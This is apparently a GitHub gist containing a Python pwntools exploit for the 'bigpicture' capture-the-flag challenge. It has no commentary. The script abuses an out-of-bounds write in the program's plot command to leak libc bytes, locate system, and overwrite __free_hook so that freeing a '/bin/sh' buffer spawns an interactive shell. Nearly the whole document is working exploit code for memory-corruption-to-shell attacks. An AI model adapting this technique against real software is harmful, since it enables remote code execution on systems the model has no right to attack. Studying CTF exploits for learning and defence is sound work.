Skip to content

Instantly share code, notes, and snippets.

@kokjo
Created April 23, 2017 21:16
Show Gist options
  • Save kokjo/10e93fa4ac56a1d866df7f0623abac4a to your computer and use it in GitHub Desktop.
Save kokjo/10e93fa4ac56a1d866df7f0623abac4a to your computer and use it in GitHub Desktop.
from pwn import *
def pwnit():
#h, w = (1024, 1024)
w, h = (1024, 1024)
#r.sendline(" "+"0"*4096 + "1 , 0 , A")
#r.recvuntil("> ")
local = False
if local:
r = process("./bigpicture")
libc_off = -0x6a9000-0x10
libc_free_hook = 0x00000000003a77c8
libc_init = 0x3a1758 + 8
libc_init_const = 0x21860
libc_system = 0x41490
else:
r = remote("bigpicture.chal.pwning.xxx", 420)
#r = remote("104.155.98.249", 1337)
libc_off = -0x4e2000 - 0x10
libc_free_hook = 0x00000000003c57a8
libc_init = 0x3bf7d0
libc_init_const = 0x202c0
libc_system = 0x45390
r.sendline("%d x %d" % (w, h))
r.recvuntil("> ")
def send_plot(x,y,byte):
r.sendline(" %d , %d , %c" % (x, y, byte))
def leak_libc(off, size):
r.clean(1)
data = ""
for i in range(size):
send_plot(0, libc_off + off + i, "\x00")
r.recvuntil("overwriting ")
data += r.recvn(1)
return data
for i, c in enumerate("/bin/sh\x00"):
send_plot(0, i, c)
assert leak_libc(0, 4) == "\x7fELF"
libc_base = u64(leak_libc(libc_init, 6) + "\x00"*2) - libc_init_const
libc_system = libc_base + libc_system
for i, c in enumerate(p64(libc_system)):
send_plot(0, libc_off + libc_free_hook + i, c)
r.sendline("quit")
r.interactive()
pwnit()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment